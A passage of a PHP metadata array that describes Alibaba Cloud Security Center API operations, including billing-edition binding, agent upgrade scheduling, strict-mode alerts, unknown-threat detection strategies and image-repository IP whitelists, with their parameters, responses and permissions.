'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateOssScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateOssScanConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'OssScanConfig', 'arn' => 'acs:yundun-sas:*:{#accountId}:ossscanconfig/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FFA14F61-4E2F-54C7-9276-81C60BAC****\\"\\n}","type":"json"}]', ], 'UpdatePostPaidBindRel' => [ 'summary' => 'Changes the protection edition bound to a server after you activate the pay-as-you-go billing method for host and container security.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'paid', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BindAction', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The binding action parameter.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'UuidList' => [ 'description' => 'The list of server UUIDs.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '82e29**f0816da', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'minItems' => 0, 'title' => '', 'example' => '', ], 'Version' => ['description' => 'The protection edition of Security Center to bind. Valid values: '."\n" .'- **1**: Free Edition '."\n" .'- **3**: Enterprise Edition'."\n" .'- **5**: Premium Edition'."\n" .'- **6**: Anti-virus Edition '."\n" .'- **7**: Ultimate Edition', 'type' => 'string', 'required' => false, 'example' => '3', 'title' => ''], 'BindAll' => ['description' => 'Specifies whether to bind all servers. Default value: **false**. Valid values:'."\n" ."\n" .'- **true**: yes'."\n" .'- **false**: no', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'AutoBind', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to automatically bind newly added assets. Valid values:'."\n" ."\n" .'- **0**: disabled'."\n" .'- **1**: enabled', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'AutoBindVersion', 'in' => 'query', 'schema' => ['description' => 'The edition to automatically bind when a new asset is added. Valid values:'."\n" .'- **1**: Free Edition '."\n" .'- **3**: Enterprise Edition'."\n" .'- **5**: Premium Edition'."\n" .'- **6**: Anti-virus Edition '."\n" .'- **7**: Ultimate Edition', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], ], [ 'name' => 'UpdateIfNecessary', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcibly upgrade the edition.', 'type' => 'boolean', 'default' => 'false', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'ProductCode', 'in' => 'query', 'schema' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F'], 'ResultCode' => ['title' => '', 'description' => 'The status code of the binding result. Valid values:'."\n" ."\n" .'- **0**: Success.'."\n" .'- **1**: Parameter error.'."\n" .'- **2**: Insufficient server authorization quota.'."\n" .'- **3**: Insufficient server core authorization quota.'."\n" .'- **4**: Pay-as-you-go billing is not activated.'."\n" .'- **5**: Service suspended due to overdue payment.'."\n" .'- **6**: Serverless protection is not enabled.'."\n" .'- **7**: Pay-as-you-go host and container security service is not activated.'."\n" .'- **-1**: Binding exception.', 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'BindCount' => ['title' => '', 'description' => 'The number of servers that are successfully bound.', 'type' => 'integer', 'format' => 'int64', 'example' => '2'], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Change pay-as-you-go service protection edition', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePostPaidBindRel'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F\\",\\n \\"ResultCode\\": 0,\\n \\"BindCount\\": 2\\n}","type":"json"}]', ], 'UpdatePublishAutoUpgrade' => [ 'summary' => 'Enables or disables automatic upgrade.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '150874', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AutoUpgrade', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable automatic upgrade. Valid values:'."\n" ."\n" .'- **1**: enabled'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify automatic upgrade switch', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishAutoUpgrade'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdatePublishAutoUpgrade', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\"\\n}","type":"json"}]', ], 'UpdatePublishBatch' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '144974', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BatchId', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The ID of the release batch.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '52370', 'title' => ''], ], [ 'name' => 'OperationBase', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The asset selection dimension. Valid values:'."\n" ."\n" .'- **0**: machine instance'."\n" .'- **1**: machine group'."\n" .'- **2**: VPC-connected instance ID', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'BatchName', 'in' => 'query', 'schema' => ['description' => 'The name of the release batch.', 'type' => 'string', 'required' => false, 'example' => '批次1', 'title' => ''], ], [ 'name' => 'Interval', 'in' => 'query', 'schema' => ['description' => 'The interval between release batches.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '60', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB******', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update a release batch', 'summary' => 'Updates a release batch.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishBatch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdatePublishBatch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB******\\"\\n}","type":"json"}]', ], 'UpdatePublishCron' => [ 'summary' => 'Modifies the configuration of the client upgrade time.'."\n" ."\n" .'To use this feature, contact technical support.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '142161', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Cron', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The Cron expression for the upgrade start time.', 'type' => 'string', 'required' => true, 'example' => '0 5 10 * * ?', 'title' => ''], ], [ 'name' => 'Duration', 'in' => 'query', 'schema' => ['description' => 'The upgrade duration. Unit: hours.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '24', 'title' => ''], ], [ 'name' => 'CronType', 'in' => 'query', 'schema' => ['description' => 'The upgrade start cycle type. Valid values:'."\n" .'- **day**: every day'."\n" .'- **week**: every week.', 'type' => 'string', 'required' => false, 'example' => 'day', 'title' => ''], ], [ 'name' => 'CronDay', 'in' => 'query', 'schema' => ['description' => 'The day of the week for the upgrade time. Valid values:'."\n" .'- **MON**: Monday'."\n" .'- **TUE**: Tuesday'."\n" .'- **WED**: Wednesday'."\n" .'- **THU**: Thursday'."\n" .'- **FRI**: Friday'."\n" .'- **SAT**: Saturday'."\n" .'- **SUN**: Sunday.', 'type' => 'string', 'required' => false, 'example' => 'SUN', 'title' => ''], ], [ 'name' => 'CronTime', 'in' => 'query', 'schema' => ['description' => 'The publish start timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1657407600000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1052B989-305B-50A5-B5F5-998450******', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify client upgrade time', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishCron'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdatePublishCron', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1052B989-305B-50A5-B5F5-998450******\\"\\n}","type":"json"}]', ], 'UpdatePublishGraySwitch' => [ 'summary' => 'Updates the settings of the canary release feature for agent upgrade. If you want to use the feature, contact technical support.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '142151', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'GraySwitchStatus', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the canary release feature. Valid values:'."\n" ."\n" .'- **1**: enabled.'."\n" ."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '231A8A81-CBB4-5AB3-A624-98A501******', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"231A8A81-CBB4-5AB3-A624-98A501******\\"\\n}","type":"json"}]', 'title' => 'UpdatePublishGraySwitch', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishGraySwitch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdatePublishGraySwitch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateSelectionKeyByType' => [ 'summary' => 'Modifies the key that corresponds to a specified type.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '173123', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'BusinessType', 'in' => 'query', 'schema' => ['description' => 'The business type of the asset selection. Valid values:'."\n" ."\n" .'- **VIRUS\\_SCAN\\_CYCLE\\_CONFIG**: virus scan configuration.'."\n" .'- **VIRUS\\_SCAN\\_ONCE\\_TASK**: one-time virus scan.'."\n" .'- **AGENTLESS_MALICIOUS_WHITE_LIST_[ID]**: agentless detection alert whitelisting rule.'."\n" .'- **AGENTLESS_VUL_WHITE_LIST_[ID]**: agentless detection vulnerability whitelisting rule.'."\n" .'- **FILE_PROTECT_RULE_SWITCH_TYPE_[ID]**: core file protection.', 'type' => 'string', 'required' => false, 'example' => 'VIRUS_SCAN_CYCLE_CONFIG', 'title' => ''], ], [ 'name' => 'SelectionKey', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the asset selection.', 'type' => 'string', 'required' => false, 'example' => '614d179e-4776-4939-a04a-d842ce64****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'DBABBC2E-26DF-5586-BF7C-4FC846EF****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update the key for an asset selection type', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateSelectionKeyByType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateSelectionKeyByType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DBABBC2E-26DF-5586-BF7C-4FC846EF****\\"\\n}","type":"json"}]', ], 'UpdateStrictEventName' => [ 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '215997', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Operator', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The operator for the rule action. Valid values:'."\n" .'- *on*: enables alerting'."\n" .'- *off*: disables alerting.', 'type' => 'string', 'required' => true, 'example' => 'on', 'title' => ''], ], [ 'name' => 'EventNameList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of strict mode alerts to operate on. This is a full list. Strict mode alerts not included in this list will have the opposite action applied.'."\n" .'> Call [DescribeStrictEventName](~~DescribeStrictEventName~~) to obtain the list of all strict mode alerts.'."\n" .'> -.', 'type' => 'array', 'items' => ['description' => 'The name of the alert.', 'type' => 'string', 'required' => false, 'example' => 'WEBSHELL', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response struct.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify strict mode alert status', 'summary' => 'Modifies the strict mode configuration, including whether to enable alerting in strict mode. This is a full-update operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateStrictEventName'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:updateStrictEventName', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\"\\n}","type":"json"}]', ], 'UpdateTargetListByBatch' => [ 'summary' => 'Updates the machines included in a batch.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '142158', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'BatchId', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The ID of the release batch.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '52370', 'title' => ''], ], [ 'name' => 'OperationList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset operations.', 'type' => 'array', 'items' => [ 'description' => 'The list of asset operations.', 'type' => 'object', 'properties' => [ 'Operation' => ['description' => 'The operation type. Valid values:'."\n" ."\n" .'- **add**: increase.'."\n" .'- **del**: delete.', 'type' => 'string', 'required' => false, 'example' => 'add', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group.'."\n" .'> Call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the server group ID.', 'type' => 'string', 'required' => false, 'example' => '11883086', 'title' => ''], 'VpcInstanceId' => ['description' => 'The ID of the VPC-connected instance.', 'type' => 'string', 'required' => false, 'example' => 'vpc-bp1ow0rm9t92iza******', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'de393767-6fe1-4a8d-837d-927a2b******', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => true, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China value is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'FBBEB173-1F43-505F-A876-C03ECD******', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update machines in a batch', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateTargetListByBatch', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FBBEB173-1F43-505F-A876-C03ECD******\\"\\n}","type":"json"}]', ], 'UpdateUnknownThreatDetectProcess' => [ 'summary' => 'Updates the remark for a specified unknown threat detection process.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'ProcessId', 'in' => 'query', 'schema' => ['description' => 'The process ID.', 'type' => 'string', 'required' => false, 'example' => '2026011210040602108912721603151374234', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remark for the process.', 'type' => 'string', 'required' => false, 'example' => 'remark', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique ID of the request, generated by Alibaba Cloud. You can use this ID to troubleshoot issues.', 'type' => 'string', 'title' => '', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****'], ], 'title' => '', 'description' => 'The response schema.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'UpdateUnknownThreatDetectProcess', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateUnknownThreatDetectProcess', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', ], 'UpdateUnknownThreatDetectStrategy' => [ 'summary' => 'Updates the unknown threat detection strategy.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The ID of the unknown threat detection strategy to update.', 'type' => 'string', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the unknown threat detection strategy.', 'type' => 'string', 'required' => false, 'example' => 'strategy****', 'title' => ''], ], [ 'name' => 'StudyMode', 'in' => 'query', 'schema' => ['description' => 'The whitelist mode. Valid values are:'."\n" ."\n" .'- **hash**: process hash'."\n" ."\n" .'- **path**: process path', 'type' => 'string', 'required' => false, 'example' => 'hash', 'title' => ''], ], [ 'name' => 'DurationDaysAfterInit', 'in' => 'query', 'schema' => ['description' => 'The number of days the model learns for after its creation.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DurationDaysAfterStop', 'in' => 'query', 'schema' => ['description' => 'The number of consecutive days without new processes before the model stops learning.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'title' => '', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C******'], ], 'title' => '', 'description' => 'Response schema.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'UpdateUnknownThreatDetectStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateUnknownThreatDetectStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C******\\"\\n}","type":"json"}]', ], 'UpdateWhiteList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92454', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'RegistryId', 'in' => 'query', 'schema' => ['description' => 'The image repository ID.'."\n" .'>You can call the [PageImageRegistry](~~PageImageRegistry~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '19882', 'title' => ''], ], [ 'name' => 'WhiteList', 'in' => 'query', 'schema' => ['description' => 'The whitelist. Separate multiple whitelisted addresses with commas (,).', 'type' => 'string', 'required' => true, 'example' => '192.168.XXX.XXX,192.180.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The processing result.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '576EF709-71CE-500F-95FC-7F7A297D****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update the IP address whitelist of an image repository', 'summary' => 'Updates the IP address whitelist of an image repository.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ 